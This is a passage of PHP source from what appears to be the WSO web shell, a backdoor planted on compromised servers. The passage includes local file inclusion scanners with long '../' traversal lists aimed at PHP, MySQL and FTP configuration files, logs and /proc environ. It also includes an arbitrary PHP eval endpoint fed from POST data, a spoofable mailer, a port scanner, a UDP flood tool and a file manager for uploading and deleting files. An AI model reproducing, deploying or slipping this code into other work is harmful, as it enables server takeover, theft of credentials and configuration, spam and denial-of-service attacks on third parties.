602 4 => "../../../../../../../../../../../../../../../usr/lib/php.ini".$byte1."",
603 5 => "../../../../../../../../../../../../../../../usr/lib/php/php.ini".$byte1."",
604 6 => "../../../../../../../../../../../../../../../usr/local/etc/php.ini".$byte1."",
605 7 => "../../../../../../../../../../../../../../../usr/local/lib/php.ini".$byte1."",
606 8 => "../../../../../../../../../../../../../../../usr/local/php/lib/php.ini".$byte1."",
607 9 => "../../../../../../../../../../../../../../../usr/local/php4/lib/php.ini".$byte1."",
608 10 => "../../../../../../../../../../../../../../../usr/local/php5/lib/php.ini".$byte1."",
609 11 => "../../../../../../../../../../../../../../../usr/local/apache/conf/php.ini".$byte1."",
610 12 => "../../../../../../../../../../../../../../../etc/php4.4/fcgi/php.ini".$byte1."",
611 13 => "../../../../../../../../../../../../../../../etc/php4/apache/php.ini".$byte1."",
612 14 => "../../../../../../../../../../../../../../../etc/php4/apache2/php.ini".$byte1."",
613 15 => "../../../../../../../../../../../../../../../etc/php5/apache/php.ini".$byte1."",
614 16 => "../../../../../../../../../../../../../../../etc/php5/apache2/php.ini".$byte1."",
615 17 => "../../../../../../../../../../../../../../../etc/php/php.ini".$byte1."",
616 18 => "../../../../../../../../../../../../../../../etc/php/php4/php.ini".$byte1."",
617 19 => "../../../../../../../../../../../../../../../etc/php/apache/php.ini".$byte1."",
618 20 => "../../../../../../../../../../../../../../../etc/php/apache2/php.ini".$byte1."",
619 21 => "../../../../../../../../../../../../../../../web/conf/php.ini".$byte1."",
620 22 => "../../../../../../../../../../../../../../../usr/local/Zend/etc/php.ini".$byte1."",
621 23 => "../../../../../../../../../../../../../../../opt/xampp/etc/php.ini".$byte1."",
622 24 => "../../../../../../../../../../../../../../../var/local/www/conf/php.ini".$byte1."",
623 25 => "../../../../../../../../../../../../../../../etc/php/cgi/php.ini".$byte1."",
624 26 => "../../../../../../../../../../../../../../../etc/php4/cgi/php.ini".$byte1."",
625 27 => "../../../../../../../../../../../../../../../etc/php5/cgi/php.ini".$byte1."");
626
627 $lfimysql = array(
628 1 => "../../../../../../../../../../../../../../../var/log/mysql/mysql-bin.log".$byte1."",
629 2 => "../../../../../../../../../../../../../../../var/log/mysql.log".$byte1."",
630 3 => "../../../../../../../../../../../../../../../var/log/mysqlderror.log".$byte1."",
631 4 => "../../../../../../../../../../../../../../../var/log/mysql/mysql.log".$byte1."",
632 5 => "../../../../../../../../../../../../../../../var/log/mysql/mysql-slow.log".$byte1."",
633 6 => "../../../../../../../../../../../../../../../var/mysql.log".$byte1."",
634 7 => "../../../../../../../../../../../../../../../var/lib/mysql/my.cnf".$byte1."",
635 8 => "../../../../../../../../../../../../../../../etc/mysql/my.cnf".$byte1."",
636 9 => "../../../../../../../../../../../../../../../var/log/mysqld.log".$byte1."",
637 10 => "../../../../../../../../../../../../../../../etc/my.cnf".$byte1."");
638
639 $lfiftp = array(
640 1 => "../../../../../../../../../../../../../../../etc/logrotate.d/proftpd".$byte1."",
641 2 => "../../../../../../../../../../../../../../../www/logs/proftpd.system.log".$byte1."",
642 3 => "../../../../../../../../../../../../../../../var/log/proftpd".$byte1."",
643 4 => "../../../../../../../../../../../../../../../etc/proftp.conf".$byte1."",
644 5 => "../../../../../../../../../../../../../../../etc/protpd/proftpd.conf".$byte1."",
645 6 => "../../../../../../../../../../../../../../../etc/vhcs2/proftpd/proftpd.conf".$byte1."",
646 7 => "../../../../../../../../../../../../../../../etc/proftpd/modules.conf".$byte1."",
647 8 => "../../../../../../../../../../../../../../../var/log/vsftpd.log".$byte1."",
648 9 => "../../../../../../../../../../../../../../../etc/vsftpd.chroot_list".$byte1."",
649 10 => "../../../../../../../../../../../../../../../etc/logrotate.d/vsftpd.log".$byte1."",
650 11 => "../../../../../../../../../../../../../../../etc/vsftpd/vsftpd.conf".$byte1."",
651 12 => "../../../../../../../../../../../../../../../etc/vsftpd.conf".$byte1."",
652 13 => "../../../../../../../../../../../../../../../etc/chrootUsers".$byte1."",
653 14 => "../../../../../../../../../../../../../../../var/log/xferlog".$byte1."",
654 15 => "../../../../../../../../../../../../../../../var/adm/log/xferlog".$byte1."",
655 16 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftpaccess".$byte1."",
656 17 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftphosts".$byte1."",
657 18 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftpusers".$byte1."",
658 19 => "../../../../../../../../../../../../../../../usr/sbin/pure-config.pl".$byte1."",
659 20 => "../../../../../../../../../../../../../../../usr/etc/pure-ftpd.conf".$byte1."",
660 21 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.conf".$byte1."",
661 22 => "../../../../../../../../../../../../../../../usr/local/etc/pure-ftpd.conf".$byte1."",
662 23 => "../../../../../../../../../../../../../../../usr/local/etc/pureftpd.pdb".$byte1."",
663 24 => "../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pureftpd.pdb".$byte1."",
664 25 => "../../../../../../../../../../../../../../../usr/local/pureftpd/sbin/pure-config.pl".$byte1."",
665 26 => "../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pure-ftpd.conf".$byte1."",
666 27 => "../../../../../../../../../../../../../../../etc/pure-ftpd.conf".$byte1."",
667 28 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.pdb".$byte1."",
668 29 => "../../../../../../../../../../../../../../../etc/pureftpd.pdb".$byte1."",
669 30 => "../../../../../../../../../../../../../../../etc/pureftpd.passwd".$byte1."",
670 31 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pureftpd.pdb".$byte1."",
671 32 => "../../../../../../../../../../../../../../../usr/ports/ftp/pure-ftpd/".$byte1."",
672 33 => "../../../../../../../../../../../../../../../usr/ports/net/pure-ftpd/".$byte1."",
673 34 => "../../../../../../../../../../../../../../../usr/pkgsrc/net/pureftpd/".$byte1."",
674 35 => "../../../../../../../../../../../../../../../usr/ports/contrib/pure-ftpd/".$byte1."",
675 36 => "../../../../../../../../../../../../../../../var/log/pure-ftpd/pure-ftpd.log".$byte1."",
676 37 => "../../../../../../../../../../../../../../../logs/pure-ftpd.log".$byte1."",
677 38 => "../../../../../../../../../../../../../../../var/log/pureftpd.log".$byte1."",
678 39 => "../../../../../../../../../../../../../../../var/log/ftp-proxy/ftp-proxy.log".$byte1."",
679 40 => "../../../../../../../../../../../../../../../var/log/ftp-proxy".$byte1."",
680 41 => "../../../../../../../../../../../../../../../var/log/ftplog".$byte1."",
681 42 => "../../../../../../../../../../../../../../../etc/logrotate.d/ftp".$byte1."",
682 43 => "../../../../../../../../../../../../../../../etc/ftpchroot".$byte1."",
683 44 => "../../../../../../../../../../../../../../../etc/ftphosts".$byte1."");
684
685
686 $x = 1;
687 if ( $type == 1 ) {
688 $res1 = FetchURL($target.$lfitest);
689 $res2 = FetchURL($target.$lfitest2);
690 $rhash1 = md5($res1);
691 $rhash2 = md5($res2);
692 if ($rhash1 != $rhash2) {
693 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
694 while($lfiaccess[$x]) {
695 $res3 = FetchURL($target.$lfiaccess[$x]);
696 $rhash3 = md5($res3);
697 if ($rhash3 != $rhash2) {
698 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiaccess[$x]."\">".$target."".$lfiaccess[$x]."</a><br />";
699 }
700 else {
701 print "<font color='red'>[!] Failed!</font>".$target."".$lfiaccess[$x]."<br />";
702 }
703 $x++;
704 }
705 }
706 }
707 if ( $type == 2 ) {
708 $res1 = FetchURL($target.$lfitest);
709 $res2 = FetchURL($target.$lfitest2);
710 $rhash1 = md5($res1);
711 $rhash2 = md5($res2);
712 if ($rhash1 != $rhash2) {
713 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
714 while($lficonfig[$x]) {
715 $res3 = FetchURL($target.$lficonfig[$x]);
716 $rhash3 = md5($res3);
717 if ($rhash3 != $rhash2) {
718 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lficonfig[$x]."\">".$target."".$lficonfig[$x]."</a><br />";
719 }
720 else {
721 print "<font color='red'>[!] Failed!</font>".$target."".$lficonfig[$x]."<br />";
722 }
723 $x++;
724 }
725 }
726 }
727 if ( $type == 3 ) {
728 $res1 = FetchURL($target.$lfitest);
729 $res2 = FetchURL($target.$lfitest2);
730 $rhash1 = md5($res1);
731 $rhash2 = md5($res2);
732 if ($rhash1 != $rhash2) {
733 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
734 while($lfierror[$x]) {
735 $res3 = FetchURL($target.$lfierror[$x]);
736 $rhash3 = md5($res3);
737 if ($rhash3 != $rhash2) {
738 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfierror[$x]."\">".$target."".$lfierror[$x]."</a><br />";
739 }
740 else {
741 print "<font color='red'>[!] Failed!</font>".$target."".$lfierror[$x]."<br />";
742 }
743 $x++;
744 }
745 }
746 }
747 if ( $type == 4 ) {
748 $res1 = FetchURL($target.$lfitest);
749 $res2 = FetchURL($target.$lfitest2);
750 $rhash1 = md5($res1);
751 $rhash2 = md5($res2);
752 if ($rhash1 != $rhash2) {
753 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
754 while($lfiphpini[$x]) {
755 $res3 = FetchURL($target.$lfiphpini[$x]);
756 $rhash3 = md5($res3);
757 if ($rhash3 != $rhash2) {
758 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiphpini[$x]."\">".$target."".$lfiphpini[$x]."</a><br />";
759 }
760 else {
761 print "<font color='red'>[!] Failed!</font>".$target."".$lfiphpini[$x]."<br />";
762 }
763 $x++;
764 }
765 }
766 }
767 if ( $type == 5 ) {
768 $res1 = FetchURL($target.$lfitest);
769 $res2 = FetchURL($target.$lfitest2);
770 $rhash1 = md5($res1);
771 $rhash2 = md5($res2);
772 if ($rhash1 != $rhash2) {
773 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
774 while($lfimysql[$x]) {
775 $res3 = FetchURL($target.$lfimysql[$x]);
776 $rhash3 = md5($res3);
777 if ($rhash3 != $rhash2) {
778 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfimysql[$x]."\">".$target."".$lfimysql[$x]."</a><br />";
779 }
780 else {
781 print "<font color='red'>[!] Failed!</font>".$target."".$lfimysql[$x]."<br />";
782 }
783 $x++;
784 }
785 }
786 }
787 if ( $type == 6 ) {
788 $res1 = FetchURL($target.$lfitest);
789 $res2 = FetchURL($target.$lfitest2);
790 $rhash1 = md5($res1);
791 $rhash2 = md5($res2);
792 if ($rhash1 != $rhash2) {
793 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
794 while($lfiftp[$x]) {
795 $res3 = FetchURL($target.$lfiftp[$x]);
796 $rhash3 = md5($res3);
797 if ($rhash3 != $rhash2) {
798 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiftp[$x]."\">".$target."".$lfiftp[$x]."</a><br />";
799 }
800 else {
801 print "<font color='red'>[!] Failed!</font>".$target."".$lfiftp[$x]."<br />";
802 }
803 $x++;
804 }
805 }
806 }
807if ( $type == 7 ) {
808 $res1 = FetchURL($target.$lfitest);
809 $res2 = FetchURL($target.$lfitest2);
810 $rhash1 = md5($res1);
811 $rhash2 = md5($res2);
812 if ($rhash1 != $rhash2) {
813 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";{
814 $res3 = FetchURL($target.$lfiprocenv);
815 $rhash3 = md5($res3);
816 if ($rhash3 != $rhash2) {
817 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiprocenv."\">".$target."".$lfiprocenv."</a><br />";
818 }
819 else {
820 print "<font color='red'>[!] Failed!</font>".$target."".$lfiprocenv."<br />";
821 }
822 }
823 }
824 }
825 }
826wsoFooter();
827}
828function actionphptools() {
829wsoHeader();
830?><center><?php
831//mailer
832echo '<b>Mailer</b><br>
833<form action="'.$surl.'" method=POST>
834<input type="hidden" name="a" value="phptools">
835<input type=text name=to value=to><br>
836<input type=text name=from value=from><br>
837<input type=text name=subject value=subject><br>
838<input type=text name=body value=body><br>
839<input type=submit name=submit value=Submit></form>';
840if (isset($_POST['to']) && isset($_POST['from']) && isset($_POST['subject']) && isset($_POST['body'])) {
841 $headers = 'From: '.$_POST['from'];
842 mail ($_POST['to'],$_POST['subject'],$_POST['body'],$headers);
843 echo 'Email sent.';
844}
845
846//port scanner
847echo '<br><b>Port Scanner</b><br>';
848$start = strip_tags($_POST['start']);
849$end = strip_tags($_POST['end']);
850$host = strip_tags($_POST['host']);
851
852if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
853for($i = $start; $i<=$end; $i++){
854 $fp = @fsockopen($host, $i, $errno, $errstr, 3);
855 if($fp){
856 echo 'Port '.$i.' is <font color=green>open</font><br>';
857 }
858 flush();
859 }
860}else{
861?>
862<form action="?" method="POST">
863<input type="hidden" name="a" value="phptools">
864Host:<br />
865<input type="text" name="host" value="localhost"/><br />
866Port start:<br />
867<input type="text" name="start" value="0"/><br />
868Port end:<br />
869<input type="text" name="end" value="5000"/><br />
870<input type="submit" value="Scan Ports" />
871</form>
872<?php
873}
874
875//UDP
876if(isset($_POST['host'])&&is_numeric($_POST['time'])){
877 $pakits = 0;
878 ignore_user_abort(TRUE);
879 set_time_limit(0);
880
881 $exec_time = $_POST['time'];
882
883 $time = time();
884 //print "Started: ".time('h:i:s')."<br>";
885 $max_time = $time+$exec_time;
886
887 $host = $_POST['host'];
888
889 for($i=0;$i<65000;$i++){
890 $out .= 'X';
891 }
892 while(1){
893 $pakits++;
894 if(time() > $max_time){
895 break;
896 }
897 $rand = rand(1,65000);
898 $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
899 if($fp){
900 fwrite($fp, $out);
901 fclose($fp);
902 }
903 }
904 echo "<br><b>UDP Flood</b><br>Completed with $pakits (" . round(($pakits*65)/1024, 2) . " MB) packets averaging ". round($pakits/$exec_time, 2) . " packets per second \n";
905 echo '<br><br>
906 <form action="'.$surl.'" method=POST>
907 <input type="hidden" name="a" value="phptools">
908 Host: <input type=text name=host value=localhost>
909 Length (seconds): <input type=text name=time value=9999>
910 <input type=submit value=Go></form>';
911}else{ echo '<br><b>UDP Flood</b><br>
912 <form action=? method=POST>
913 <input type="hidden" name="a" value="phptools">
914 Host: <br><input type=text name=host value=localhost><br>
915 Length (seconds): <br><input type=text name=time value=9999><br>
916 <input type=submit value=Go></form>';
917}
918?></center><?php
919wsoFooter();}
920function actionPhp() {
921 if(isset($_POST['ajax'])) {
922 $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = true;
923 ob_start();
924 eval($_POST['p1']);
925 $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n";
926 echo strlen($temp), "\n", $temp;
927 exit;
928 }
929 wsoHeader();
930 if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) {
931 echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>';
932 ob_start();
933 phpinfo();
934 $tmp = ob_get_clean();
935 $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
936 $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
937 echo str_replace('<h1','<h2', $tmp) .'</div><br>';
938 }
939 if(empty($_POST['ajax']) && !empty($_POST['p1']))
940 $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
941 echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
942 echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
943 if(!empty($_POST['p1'])) {
944 ob_start();
945 eval($_POST['p1']);
946 echo htmlspecialchars(ob_get_clean());
947 }
948 echo '</pre></div>';
949 wsoFooter();
950}
951
952function actionFilesMan() {
953 wsoHeader();
954 echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
955 if(!empty($_POST['p1'])) {
956 switch($_POST['p1']) {
957 case 'uploadFile':
958 if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
959 echo "Can't upload file!";
960 break;
961 case 'mkdir':
962 if(!@mkdir($_POST['p2']))
963 echo "Can't create new dir";
964 break;
965 case 'delete':
966 function deleteDir($path) {
967 $path = (substr($path,-1)=='/') ? $path:$path.'/';
968 $dh = opendir($path);
969 while ( ($item = readdir($dh) ) !== false) {
970 $item = $path.$item;
971 if ( (basename($item) == "..") || (basename($item) == ".") )
972 continue;
973 $type = filetype($item);
974 if ($type == "dir")
975 deleteDir($item);
976 else
977 @unlink($item);
978 }
979 closedir($dh);
980 @rmdir($path);
981 }
982 if(is_array(@$_POST['f']))
983 foreach($_POST['f'] as $f) {
984 if($f == '..')
985 continue;
986 $f = urldecode($f);
987 if(is_dir($f))
988 deleteDir($f);
989 else
990 @unlink($f);
991 }
992 break;
993 case 'paste':
994 if($_SESSION['act'] == 'copy') {
995 function copy_paste($c,$s,$d){
996 if(is_dir($c.$s)){
997 mkdir($d.$s);
998 $h = @opendir($c.$s);
999 while (($f = @readdir($h)) !== false)
1000 if (($f != ".") and ($f != ".."))
1001 copy_paste($c.$s.'/',$f, $d.$s.'/');
1002 } elseif(is_file($c.$s))
1003 @copy($c.$s, $d.$s);
1004 }
1005 foreach($_SESSION['f'] as $f)
1006 copy_paste($_SESSION['c'],$f, $GLOBALS['cwd']);
1007 } elseif($_SESSION['act'] == 'move') {
1008 function move_paste($c,$s,$d){
1009 if(is_dir($c.$s)){
1010 mkdir($d.$s);
1011 $h = @opendir($c.$s);
1012 while (($f = @readdir($h)) !== false)
1013 if (($f != ".") and ($f != ".."))
1014 copy_paste($c.$s.'/',$f, $d.$s.'/');
1015 } elseif(@is_file($c.$s))
1016 @copy($c.$s, $d.$s);
1017 }
1018 foreach($_SESSION['f'] as $f)
1019 @rename($_SESSION['c'].$f, $GLOBALS['cwd'].$f);
1020 } elseif($_SESSION['act'] == 'zip') {
1021 if(class_exists('ZipArchive')) {
1022 $zip = new ZipArchive();
1023 if ($zip->open($_POST['p2'], 1)) {
1024 chdir($_SESSION['c']);
1025 foreach($_SESSION['f'] as $f) {
1026 if($f == '..')
1027 continue;
1028 if(@is_file($_SESSION['c'].$f))
1029 $zip->addFile($_SESSION['c'].$f, $f);
1030 elseif(@is_dir($_SESSION['c'].$f)) {
1031 $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
1032 foreach ($iterator as $key=>$value) {
1033 $zip->addFile(realpath($key), $key);
1034 }
1035 }
1036 }
1037 chdir($GLOBALS['cwd']);
1038 $zip->close();
1039 }
1040 }
1041 } elseif($_SESSION['act'] == 'unzip') {
1042 if(class_exists('ZipArchive')) {
1043 $zip = new ZipArchive();
1044 foreach($_SESSION['f'] as $f) {
1045 if($zip->open($_SESSION['c'].$f)) {
1046 $zip->extractTo($GLOBALS['cwd']);
1047 $zip->close();
1048 }
1049 }
1050 }
1051 } elseif($_SESSION['act'] == 'tar') {
1052 chdir($_SESSION['c']);
1053 $_SESSION['f'] = array_map('escapeshellarg', $_SESSION['f']);
1054 wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_SESSION['f']));
1055 chdir($GLOBALS['cwd']);
1056 }
1057 unset($_SESSION['f']);
1058 break;
1059 default:
1060 if(!empty($_POST['p1'])) {
1061 $_SESSION['act'] = @$_POST['p1'];
1062 $_SESSION['f'] = @$_POST['f'];
1063 foreach($_SESSION['f'] as $k => $f)
1064 $_SESSION['f'][$k] = urldecode($f);
1065 $_SESSION['c'] = @$_POST['c'];
1066 }
1067 break;
1068 }
1069 }
1070 $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
1071 if($dirContent === false) { echo 'Can\'t open this folder!';wsoFooter(); return; }
1072 global $sort;
1073 $sort = array('name', 1);
1074 if(!empty($_POST['p1'])) {
1075 if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
1076 $sort = array($match[1], (int)$match[2]);
1077 }
1078echo "<script>
1079 function sa() {
1080 for(i=0;i<d.files.elements.length;i++)
1081 if(d.files.elements[i].type == 'checkbox')
1082 d.files.elements[i].checked = d.files.elements[0].checked;
1083 }
1084
1085</script>
1086<table width='100%' class='main' cellspacing='0' cellpadding='2'>
1087<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
1088 $dirs = $files = array();
1089 $n = count($dirContent);
1090 for($i=0;$i<$n;$i++) {
1091 $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
1092 $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
1093 $tmp = array('name' => $dirContent[$i],
1094 'path' => $GLOBALS['cwd'].$dirContent[$i],
1095 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
1096 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
1097 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
1098 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
1099 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
1100 );
1101 if(@is_file($GLOBALS['cwd'] . $dirContent[$i]))
1102 $files[] = array_merge($tmp, array('type' => 'file'));
1103 elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i]))
1104 $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
1105 elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&& ($dirContent[$i] != "."))
1106 $dirs[] = array_merge($tmp, array('type' => 'dir'));
1107 }
1108 $GLOBALS['sort'] = $sort;
1109 function wsoCmp($a, $b) {
1110 if($GLOBALS['sort'][0] != 'size')
1111 return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
1112 else
1113 return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
1114 }
1115 usort($files, "wsoCmp");
1116 usort($dirs, "wsoCmp");
1117 $files = array_merge($dirs, $files);
1118 $l = 0;
1119 foreach($files as $f) {
1120 echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" title=' . $f['link'] . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
1121 .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
1122 $l = $l?0:1;
1123 }
1124 echo "<tr><td colspan=7>
1125
1126 <input type=hidden name=a value='FilesMan'>
1127 <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
1128 <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
1129 <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
1130 if(class_exists('ZipArchive'))
1131 echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
1132 echo "<option value='tar'>Compress (tar.gz)</option>";
1133 if(!empty($_SESSION['act']) && @count($_SESSION['f']))
1134 echo "<option value='paste'>Paste / Compress</option>";
1135 echo "</select> ";
1136 if(!empty($_SESSION['act']) && @count($_SESSION['f']) && (($_SESSION['act'] == 'zip') || ($_SESSION['act'] == 'tar')))
1137 echo "file name: <input type=text name=p2 value='wso_" . date("Ymd_His") . "." . ($_SESSION['act'] == 'zip'?'zip':'tar.gz') . "'> ";
1138 echo "<input type='submit' value='>>'></td></tr></form></table></div>";
1139 wsoFooter();
1140}
1141
1142function actionStringTools() {
1143 if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
1144 if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
1145 if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
1146 if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
1147 if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
1148 $stringTools = array(
1149 'Base64 encode' => 'base64_encode',
1150 'Base64 decode' => 'base64_decode',
1151 'Url encode' => 'urlencode',
1152 'Url decode' => 'urldecode',
1153 'Full urlencode' => 'full_urlencode',
1154 'md5 hash' => 'md5',
1155 'sha1 hash' => 'sha1',
1156 'crypt' => 'crypt',
1157 'CRC32' => 'crc32',
1158 'ASCII to HEX' => 'ascii2hex',
1159 'HEX to ASCII' => 'hex2ascii',
1160 'HEX to DEC' => 'hexdec',
1161 'HEX to BIN' => 'hex2bin',
1162 'DEC to HEX' => 'dechex',
1163 'DEC to BIN' => 'decbin',
1164 'BIN to HEX' => 'binhex',
1165 'BIN to DEC' => 'bindec',
1166 'String to lower case' => 'strtolower',
1167 'String to upper case' => 'strtoupper',
1168 'Htmlspecialchars' => 'htmlspecialchars',
1169 'String length' => 'strlen',
1170 );
1171 if(isset($_POST['ajax'])) {
1172 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
1173 ob_start();
1174 if(in_array($_POST['p1'], $stringTools))
1175 echo $_POST['p1']($_POST['p2']);
1176 $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
1177 echo strlen($temp), "\n", $temp;
1178 exit;
1179 }
1180 wsoHeader();
1181 echo '<h1>String conversions</h1><div class=content>';
1182 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
1183 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
1184 echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
1185 foreach($stringTools as $k => $v)
1186 echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
1187 echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
1188 if(!empty($_POST['p1'])) {
1189 if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
1190 }
1191 echo"</pre></div><br><h1>Search text in files:</h1><div class=content>
1192
1193 <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
1194 <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
1195 <tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr>
1196 <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
1197 <tr><td></td><td><input type='submit' value='>>'></td></tr>
1198 </table></form>";
1199
1200 function wsoRecursiveGlob($path) {
1201 if(substr($path, -1) != '/')
1202 $path.='/';
